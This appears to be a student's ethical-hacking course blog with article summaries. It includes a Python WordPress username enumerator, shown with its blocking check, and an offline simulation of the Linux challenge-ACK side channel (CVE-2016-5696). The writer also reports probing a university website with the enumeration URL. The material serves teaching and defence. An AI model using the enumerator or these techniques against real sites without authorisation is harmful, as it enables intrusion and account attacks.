Holiday season cyber crime forecast
This article is slightly dated: it is the forecast for the 2015 holiday season and the cyber crime associated with that time of year. One can, I would assume, be almost certain that the forecast for this season is very similar. With Black Friday and Cyber Monday coming up, the holiday shopping season is basically here. The spike in hacking and theft during November and especially December is staggering. The largest share of attacks comes from financially motivated attackers, which is no surprise given the amount of money processed during the holiday season. Second are attacks from politically motivated actors. I think I'll be spending a lot more old-fashioned cash this holiday season.
'Tis the season to be hacking: Forecast for Cybercrime activities during the holidays
US cyber warfare threat against Russia
This article discusses the current state of US-Russian relations. To say the relationship between the two powers is not good would be an understatement. The US has repeatedly accused Russia of hacking the DNC and leaking its internal emails. Russia and Putin of course deny any involvement, but that has not stopped the US from taking the position that, if the Russians continue their intrusions during the election, it will launch a counterattack against its rival. According to the article, the response against Russia would come after the election. The article cites an NBC report stating that the US could strike Russian electric grids, telecommunications networks, and the Kremlin's command systems. Stealing DNC emails is certainly unlawful, but hitting major targets such as the ones reported would have a far more devastating effect, it would seem.
http://gizmodo.com/obama-may-unleash-cyberwar-on-russia-after-election-re-1788654382
Nessus Scan Report
7 Best Social Engineering Attacks Ever
This is a great article about infamous social engineering attacks throughout history. The author's tongue-in-cheek tone makes light of the intrusions, yet the damage each caused was anything but humorous. What is very interesting about the article is that the attacks are mostly technology based, meaning that at some point a hacker broke into a computer system and stole or corrupted something, but a few are not. The first entry in the list dates back to the 1960s, when the infamous Frank Abagnale (Catch Me If You Can) played different characters to trick people into thinking he was something he wasn't, a Trojan horse of sorts. The article also discusses how a man was able to rob a bank without any technology at all; the only thing he deployed to obtain millions of dollars' worth of jewelry was his charm. I think this is relevant to what Wade was mentioning about mingling with smokers outside a company's office to gain information. The article goes on to discuss several large hacks and how social engineering paved the road into the compromised systems. A security analyst is quoted at the end of the article saying, in so many words, "if you want to stay safe, engage end users". Information systems consist, essentially, of computers, data, and end users. This article certainly suggests end users are the weakest link of the three when it comes to security.
http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411
WordPress user enumeration hacking
This article discusses one way in which an attacker can easily enumerate the authors or users of a WordPress site. The attacker simply appends an author query to the site's URL: http://example.com/?author=1. WordPress looks up the user with ID 1 and redirects to that user's archive page, whose URL contains the username, so the account name shows up in the address bar without any login. What was pretty unsettling for me is that I actually run a WordPress site for a foundation I am a part of, and when I queried the site with the above URL, my username was returned. What's also interesting is that, when I ran the same URL against https://mis.temple.edu for ?user=1, the returned value was "admin". It's one thing to know who a user is, but it's another thing for an attacker to know that the administrator's username is actually admin; this is almost half the battle in carrying out a successful brute-force attack. A login form that rejects a bad username or password with the same generic "username/password incorrect" message leaves the attacker guessing both halves; once the username is known, only the password is left to guess. The article fortunately supplies PHP to add to the site (it belongs in the theme's functions.php rather than a core file such as index.php, which WordPress updates overwrite) to block author queries.
https://perishablepress.com/stop-user-enumeration-wordpress/
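As an added example (not code from the article or from WordPress itself), the following Python shows both sides of the problem: an enumerator that walks ?author=N and reads the username out of the redirect WordPress sends to the author archive, and the same numeric-author check the usual PHP fix applies, here placed in front of a constructed stand-in site so the script runs offline. The hostname, user IDs and usernames are made up, and `fake_fetch` and `hardened_fetch` are stand-ins for real HTTP requests.

```python
"""Added example: WordPress author enumeration via ?author=N, and the check that
blocks it. fake_fetch() below stands in for a real site so this runs offline; the
user ids, usernames and hostname are constructed, not taken from any real site.
"""
import re
from urllib.parse import parse_qs, urlsplit

# WordPress answers /?author=N with a redirect to the author archive, whose
# path carries the account's user_nicename (normally the login name).
AUTHOR_ARCHIVE = re.compile(r"/author/([^/]+)/?$")
# The pattern the usual PHP fix keys on: a numeric author= query parameter.
ENUM_QUERY = re.compile(r"(?:^|&)author=\d+", re.IGNORECASE)


def username_from_redirect(location):
    """Extract the username from a Location header such as /author/admin/."""
    match = AUTHOR_ARCHIVE.search(urlsplit(location).path)
    return match.group(1) if match else None


def enumerate_authors(fetch, base_url, max_id=10):
    """Walk ?author=1..max_id. fetch(url) -> (status, headers), redirects not followed."""
    found = {}
    for uid in range(1, max_id + 1):
        status, headers = fetch(f"{base_url}/?author={uid}")
        if status in (301, 302):
            name = username_from_redirect(headers.get("Location", ""))
            if name:
                found[uid] = name
    return found


def is_enumeration_request(query_string, is_admin=False):
    """Block author=N lookups from anyone who is not logged in as an administrator."""
    return not is_admin and ENUM_QUERY.search(query_string) is not None


# --- constructed stand-in for a site; this dict plays the users table ---
FAKE_USERS = {1: "admin", 2: "rboyce"}
FAKE_BASE = "http://example.com"


def fake_fetch(url):
    """Behave like an unpatched WordPress front page for ?author=N."""
    parts = urlsplit(url)
    author = parse_qs(parts.query).get("author", [None])[0]
    if author and author.isdigit() and int(author) in FAKE_USERS:
        return 302, {"Location": f"{FAKE_BASE}/author/{FAKE_USERS[int(author)]}/"}
    return 404, {}


def hardened_fetch(url):
    """Same site with the enumeration check applied before WordPress can redirect."""
    if is_enumeration_request(urlsplit(url).query):
        return 403, {}
    return fake_fetch(url)


def demo():
    """Return what the enumerator learns before and after the fix."""
    return enumerate_authors(fake_fetch, FAKE_BASE), enumerate_authors(hardened_fetch, FAKE_BASE)


if __name__ == "__main__":
    leaked, after_fix = demo()
    print("unpatched:", leaked)     # {1: 'admin', 2: 'rboyce'}
    print("hardened: ", after_fix)  # {}
```

Against a real site, replace `fake_fetch` with a function that issues the request without following redirects and returns the status code and headers. Blocking `?author=N` does not close every path to the same information: the author archive permalinks themselves (/author/name/) still reveal names, and newer WordPress versions also expose accounts through the REST API users endpoint, which this check does not cover.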
Ryan Boyce Reconnaissance Analysis – Philadelphia Truck Lines
Is port scanning illegal?
As we venture further into ethical hacking and network scanning, I think we begin to enter the gray area where ethical and unethical hacking meet. Port scanning, I believe, sits right in the middle of this gray area, as tools like nmap do not cause any damage to a system but are very revealing of how someone "could" cause damage. The comparison I have seen people make to explain the ethics of port scanning is that it's like going up to someone's house and checking which windows and doors are unlocked. Could you go to jail for this? Maybe in some county in some state. Would the homeowner be happy you came onto their property and started trying doors? Definitely not. Port scanning may technically not be illegal, but it's probably not ethical. There have been numerous court cases in which scanning was not found to be illegal; the article references Moulton v. VC3 to highlight this. The article also references the Computer Code of Conduct at Rochester Institute of Technology, which makes no mention of scanning. As Professor Mackey stressed at the beginning of the course, it is best to get permission before any scanning or hacking activities!
https://www.sans.org/reading-room/whitepapers/legal/ethics-legality-port-scanning-71
Five Phase Approach of Malicious Hackers
This article is a little dated, but it describes the approach hackers use before, during, and after breaching a system. It gives a good overview of what malicious hackers plan to do, and it coincides, essentially, with what we have been covering in class. Starting with reconnaissance, a hacker will use methods such as Google hacking, as discussed in class; the most extreme example of recon is actually going to a location and physically gaining access. Next, the individual will scan the network, as we will do in class, or as some of us have already done against the target we have been doing reconnaissance on. Ultimately, the hacker will try to gain access, maintain that access, and, perhaps most importantly, cover their tracks so as not to be detected. What is most compelling to me is the end of the article, where the author mentions that a hacker must iterate through these phases: once he or she gains access to part of the system, the reconnaissance usually has to start again. I chose to perform reconnaissance against my particular company because I felt that the industry they are in is vulnerable to attack. I also picked this company because they are not very large but have connections with very large companies that deal with sensitive information. My thinking is that, if the company I chose could be breached, then an attacker might be able to jump from their systems into other companies' systems. This would be a classic example of iterating through the phases the article talks about.
Linux kernel network stack vulnerability
This article is about a vulnerability (CVE-2016-5696) in Linux kernel versions since 3.6 that allows an off-path attacker to perform a side-channel attack. At a high level, a side-channel attack lets someone learn something about a system by passively observing an indirect channel, hence the name. One example would be watching a machine's power draw to infer its workload: the attacker is not reading the server's data but can still draw conclusions about what it is doing. Another example is timing how long a machine takes to send a response or to process a packet. A feature of TCP is windowing: the receiver advertises how many bytes beyond the last acknowledged byte it will accept, and segments whose sequence numbers fall outside that window are rejected. Professor Mackey described this during our last lecture when he explained that TCP connections confirm or deny a remote machine's acceptance of packets. Linux kernels since 3.6 implement RFC 5961, which makes the machine send a "challenge ACK" to the other end of a connection when it receives a suspicious segment, such as a SYN on an established connection or a RST whose sequence number is inside the window but is not exactly the next expected one. It is basically Linux's way of saying, "hey, this packet doesn't look right, can you confirm?". In theory this is a good thing: it defends against blind reset and injection attacks from an attacker who is not on the path between client and server. The problem is that Linux rate-limited these challenge ACKs with a single global counter (100 per second, the sysctl net.ipv4.tcp_challenge_ack_limit) shared by every connection on the host. An attacker who sends spoofed packets that appear to come from a client, and then sends packets on their own connection to the same server, can count how many challenge ACKs come back. If the count is less than the 100 allowed, part of the budget was spent answering the spoofed packets, which tells the attacker that the guessed connection really exists. The math for the next part is more involved, but repeating the same trick with guessed sequence numbers narrows down the 32-bit sequence number (and then the acknowledgement number) of that connection until the attacker can reset it or inject malicious packets into it, without ever seeing a packet of the real conversation. (This video describes how this is done when RSA encryption methods are used: https://www.youtube.com/watch?v=AZkDGaISXq8.) The fix shipped in kernel 4.7, which stopped using a fixed, predictable limit; on older kernels the workaround is to raise net.ipv4.tcp_challenge_ack_limit to a very large value so the counter can no longer be drained and measured.
The article is a good illustration of how attackers abuse the details of TCP/IP itself to break into or disrupt systems.
http://www.theregister.co.uk/2016/08/10/linux_tor_users_open_corrupted_communications/
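As an added example (my own simulation, not code from the article or from the researchers who reported the flaw), the following Python models the counting trick end to end: a server that follows the RFC 5961 rules with one global 100-per-second challenge-ACK budget, and an off-path attacker who first confirms that a guessed client/server connection exists and then finds a sequence number inside its receive window. The IP addresses, ports, window size and the victim's sequence number are constructed; the packets never leave memory, and the model skips the timing problem a real attacker has of lining up probes with the kernel's one-second counter.

```python
"""Added example (not from the article or the research it reports): an in-memory
model of the challenge-ACK counting side channel. Linux kept one global budget of
challenge ACKs per second (default 100, sysctl net.ipv4.tcp_challenge_ack_limit)
shared by every connection on the host. The off-path attacker spends part of it
with spoofed packets aimed at a guessed victim connection, drains the rest through
its own connection and counts the replies: fewer than 100 means the spoofs hit.
Addresses, ports, window size and the victim's sequence number are constructed.
"""
from dataclasses import dataclass

SEQ_SPACE = 2 ** 32
CHALLENGE_ACK_LIMIT = 100           # Linux default before the 4.7 change


@dataclass
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    flag: str                       # "SYN" or "RST", the cases RFC 5961 special-cases
    seq: int = 0


@dataclass
class Connection:
    rcv_nxt: int                    # next sequence number the server expects
    wnd: int                        # receive window in bytes


class ChallengeAckBudget:
    def __init__(self, limit=CHALLENGE_ACK_LIMIT):
        self.limit, self.used = limit, 0

    def new_second(self):           # the kernel's counter resets every second
        self.used = 0

    def try_send(self):
        if self.used >= self.limit:
            return False
        self.used += 1
        return True


class Server:
    def __init__(self, ip, budget):
        self.ip, self.budget, self.conns = ip, budget, {}

    def establish(self, peer_ip, peer_port, port, rcv_nxt, wnd):
        self.conns[(peer_ip, peer_port, self.ip, port)] = Connection(rcv_nxt, wnd)

    def receive(self, seg):
        """Return the host's reply: 'challenge_ack', 'rst', or None (silent drop)."""
        key = (seg.src, seg.sport, seg.dst, seg.dport)
        conn = self.conns.get(key)
        if conn is None:            # no such connection: a reply, but no budget spent
            return None if seg.flag == "RST" else "rst"
        if seg.flag == "SYN":       # SYN on an established connection
            return "challenge_ack" if self.budget.try_send() else None
        if seg.seq == conn.rcv_nxt: # RST with the exact expected number: real reset
            del self.conns[key]
            return None
        if (seg.seq - conn.rcv_nxt) % SEQ_SPACE < conn.wnd:   # in-window RST
            return "challenge_ack" if self.budget.try_send() else None
        return None                 # out-of-window RST is dropped silently


class OffPathAttacker:
    def __init__(self, server, ip, port, own_rcv_nxt):
        self.server, self.ip, self.port = server, ip, port
        self.own_seq = own_rcv_nxt + 1      # in-window but not exact on our own connection
        server.establish(ip, port, 80, own_rcv_nxt, 65535)

    def _round(self, spoofed):
        """Spoof, then drain the budget through our own connection; return spoofed hits."""
        self.server.budget.new_second()
        for seg in spoofed:                 # any reply goes to the spoofed source, not us
            self.server.receive(seg)
        acks = 0
        for _ in range(CHALLENGE_ACK_LIMIT):
            probe = Segment(self.ip, self.port, self.server.ip, 80, "RST", self.own_seq)
            acks += self.server.receive(probe) == "challenge_ack"
        return CHALLENGE_ACK_LIMIT - acks

    def connection_exists(self, client_ip, client_port, server_port):
        syn = Segment(client_ip, client_port, self.server.ip, server_port, "SYN")
        return self._round([syn]) > 0

    def find_in_window_seq(self, client_ip, client_port, server_port, wnd_guess, batch=256):
        """Find a sequence number inside the victim's receive window (wnd_guess <= real window)."""
        def hits(seqs):
            return self._round([Segment(client_ip, client_port, self.server.ip,
                                        server_port, "RST", s) for s in seqs])
        guesses = range(0, SEQ_SPACE, wnd_guess)    # one guess per window-sized slice
        for i in range(0, len(guesses), batch):
            group = list(guesses[i:i + batch])
            if hits(group) == 0:
                continue
            while len(group) > 1:                   # halve the group that scored a hit
                half = group[:len(group) // 2]
                group = half if hits(half) > 0 else group[len(group) // 2:]
            return group[0]
        return None


def demo():
    """Victim client 10.0.0.2:40000 talks to server 10.0.0.1:443; attacker is off-path."""
    server = Server("10.0.0.1", ChallengeAckBudget())
    server.establish("10.0.0.2", 40000, 443, 0x9A3F1C27, 65536)
    attacker = OffPathAttacker(server, "10.0.0.9", 50000, 1000)
    return (attacker.connection_exists("10.0.0.2", 40000, 443),
            attacker.connection_exists("10.0.0.2", 40001, 443),
            attacker.find_in_window_seq("10.0.0.2", 40000, 443, wnd_guess=32768))


if __name__ == "__main__":
    print(demo())
```

Each `_round` stands for one second of the real attack. Landing a spoofed RST inside the window is only the first stage; the same counting trick, now with the risk that an exact-match RST tears the connection down, narrows the value to RCV.NXT and then to an acceptable ACK number, at which point data can be injected. The lesson for defenders is that any shared counter whose depletion can be observed is a side channel, which is why kernel 4.7 stopped using a fixed limit and why raising net.ipv4.tcp_challenge_ack_limit is the stopgap on older kernels.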